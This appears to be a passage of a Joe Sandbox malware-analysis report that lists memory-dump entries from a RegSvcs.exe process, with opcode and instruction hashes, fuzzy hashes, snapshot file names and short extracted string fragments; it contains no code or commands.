                                                      • Instruction ID: 047dc9dee7d5c82e1d8c50bc971f8218d47b94bd411a66644efb1e06df495353
                                                      • Opcode Fuzzy Hash: 0c3e03f6326631901fe4051d14a3b698a49c7d057906ad09f1adb8557c6d8529
                                                      • Instruction Fuzzy Hash: A201F471F102389BCB549EA9E840A99BB7AFB84310F008479E901FB340DB39AD048BC0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 707fb7557c03db78c9201620b2157ee4336418e11e3a5ee8a6f5ea2974f147d0
                                                      • Instruction ID: c54abad5213d4a5de832ee73201dbb62d6f16f0660c9717db6654c69ad2ac8c7
                                                      • Opcode Fuzzy Hash: 707fb7557c03db78c9201620b2157ee4336418e11e3a5ee8a6f5ea2974f147d0
                                                      • Instruction Fuzzy Hash: 42F06DB0A192A87FDF51CA748D0569B7BBED703208F1154F6E504CB143E276CE4187A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-2843079600
                                                      • Opcode ID: e6a8ec7ff0b5ff5366652b60bc2552fb1fc642bb6a78cfa824913da38194a74b
                                                      • Instruction ID: a662543e3110227f1cc5aaaf90e5ac0cfd9591d4e4efbbbb9ddf70ee852b9057
                                                      • Opcode Fuzzy Hash: e6a8ec7ff0b5ff5366652b60bc2552fb1fc642bb6a78cfa824913da38194a74b
                                                      • Instruction Fuzzy Hash: BB122AB0F006298FDB64DF69C894A9DB7B2FF88304F2095A9D409AB254DB34AD45CF84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0odp$Dqdp$PH]q
                                                      • API String ID: 0-4272097961
                                                      • Opcode ID: 0f22e50cf4eebd832c90a48c95cb9070c1d8358f5d448fea6b2a24add431e5bc
                                                      • Instruction ID: 405cb30a83dfbaa2e2901b35ee5d3dcc1b99b99b7f5a38c4a9d698ef6f246b28
                                                      • Opcode Fuzzy Hash: 0f22e50cf4eebd832c90a48c95cb9070c1d8358f5d448fea6b2a24add431e5bc
                                                      • Instruction Fuzzy Hash: 9322B074B001158FCB94DF68D494AAEB7E6FF88310F1085AAD40ADB3A1DB35EC46CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: XPbq$\Obq
                                                      • API String ID: 0-409418754
                                                      • Opcode ID: b2450ceb9a28932ce19035bcbfb8bb8cc9d9072636ff0fb0beb8676470936d9c
                                                      • Instruction ID: d49ec5616bcfb7bdd31aa58e2f8fda886b6f0829c5aa29a6746c741d52568972
                                                      • Opcode Fuzzy Hash: b2450ceb9a28932ce19035bcbfb8bb8cc9d9072636ff0fb0beb8676470936d9c
                                                      • Instruction Fuzzy Hash: 7AE13771B101249FDB64DB6CC494AAEBBF6FF89310F2084AAE506DB351DA35DC41CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c233f3ee1cc1209a8c21bfa6db16f2261861ca317749617ee33290c572833b0
                                                      • Instruction ID: 919e349b975d544c756a7b02cdf4384bd41ea8cf445bd2cb57befd451cdb420a
                                                      • Opcode Fuzzy Hash: 4c233f3ee1cc1209a8c21bfa6db16f2261861ca317749617ee33290c572833b0
                                                      • Instruction Fuzzy Hash: AA230A31D10A1A8EDB10EF68C89059DF7B1FF99300F15D69AE458B7221EB70AAD5CF81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VUo
                                                      • API String ID: 0-3530549468
                                                      • Opcode ID: d9248ebc680c909f66164537e733480f22f051c03a1e2b5433d4e15199b68ef7
                                                      • Instruction ID: 5b9d41875eecc94df80a6a9c48ab034382467a884d7b78a669dac0b3bff42387
                                                      • Opcode Fuzzy Hash: d9248ebc680c909f66164537e733480f22f051c03a1e2b5433d4e15199b68ef7
                                                      • Instruction Fuzzy Hash: 6DB14F70E40209CFDF14CFA9D89579DBBF2AF88708F14D129E419AB294EB74A845CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 84dd9e2cee6d47bfe1a7c3e6763c1ca91df8e6eace1aeac32665625cd08791e7
                                                      • Instruction ID: 51a7a600741ddec71c6fc365e656f3e8fd0969c9393767069e7bdb83db82d75b
                                                      • Opcode Fuzzy Hash: 84dd9e2cee6d47bfe1a7c3e6763c1ca91df8e6eace1aeac32665625cd08791e7
                                                      • Instruction Fuzzy Hash: 88A19172E0022ACFCF45DFB5C84459EB7F2FF85310B1541AAE919AB225DB35D946CB80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-1273862796
                                                      • Opcode ID: 6787b1001e63b7265a017953764abe7f31a60dbb159ee8e79234aa729c3edc53
                                                      • Instruction ID: f1b96e9cc606e9fe18041c67ac0438e01c3f13228cb5991411f6093f396d2325
                                                      • Opcode Fuzzy Hash: 6787b1001e63b7265a017953764abe7f31a60dbb159ee8e79234aa729c3edc53
                                                      • Instruction Fuzzy Hash: 6B917170F002199FDB58DF68D994B6EB7F6FF84300F208569E885AB294DB389D41CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-981061697
                                                      • Opcode ID: 6c2e2ca72a4ade5c771a46ead6b867ac37c0482db57019a148dba8511a437dd6
                                                      • Instruction ID: 7b9b9dad13d2d031db7649a47f0edd4749ddb32dff6b5e0b2d3327040087a25b
                                                      • Opcode Fuzzy Hash: 6c2e2ca72a4ade5c771a46ead6b867ac37c0482db57019a148dba8511a437dd6
                                                      • Instruction Fuzzy Hash: EFF13CB4B002198FDB58DFA8D564A6EB7B6FF84300F208578D8059B395CB79AC42CB95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q
                                                      • API String ID: 0-858218434
                                                      • Opcode ID: 8bc8b6387fb35fba6f30f4ac194654da0d3f30dbf66470378ab561ac21e799d0
                                                      • Instruction ID: eddb2964d414837d1284e73143ed674d9c6897c30f8b8723d02491926b5a7b64
                                                      • Opcode Fuzzy Hash: 8bc8b6387fb35fba6f30f4ac194654da0d3f30dbf66470378ab561ac21e799d0
                                                      • Instruction Fuzzy Hash: 9EB13970F00219CFDB55DFA8D59069EB7A6EF84300F248469E4069B354DB78DD82CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q
                                                      • API String ID: 0-858218434
                                                      • Opcode ID: 57d9062001a2fa43107fe63aff42a35cb5bcd5d5fdd9b89394cd28155cc65e19
                                                      • Instruction ID: 1bb76d833eec8ff157a0f965a34823cc0d809e7b3e0e4d88ea2bfce5aff58bf1
                                                      • Opcode Fuzzy Hash: 57d9062001a2fa43107fe63aff42a35cb5bcd5d5fdd9b89394cd28155cc65e19
                                                      • Instruction Fuzzy Hash: 8451B274F102259FCB65DF68D590AAEB7B2EF84300F2095A9E845EB254DB39EC41CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR]q$LR]q$$]q$$]q
                                                      • API String ID: 0-3527005858
                                                      • Opcode ID: efd578448fa77aa3a43217f1f317ff1eca9900ef44b044cfda23665c6a97c7d8
                                                      • Instruction ID: ff5abef3b0ffe8c928f3fec6cf4f0be42e3adcfecab304c76e4e8d72c8b3be44
                                                      • Opcode Fuzzy Hash: efd578448fa77aa3a43217f1f317ff1eca9900ef44b044cfda23665c6a97c7d8
                                                      • Instruction Fuzzy Hash: 9A51C770B002159FDB58DF68D950A6A77F6FF84300F1495A8F8069B3A5DB78EC41CB92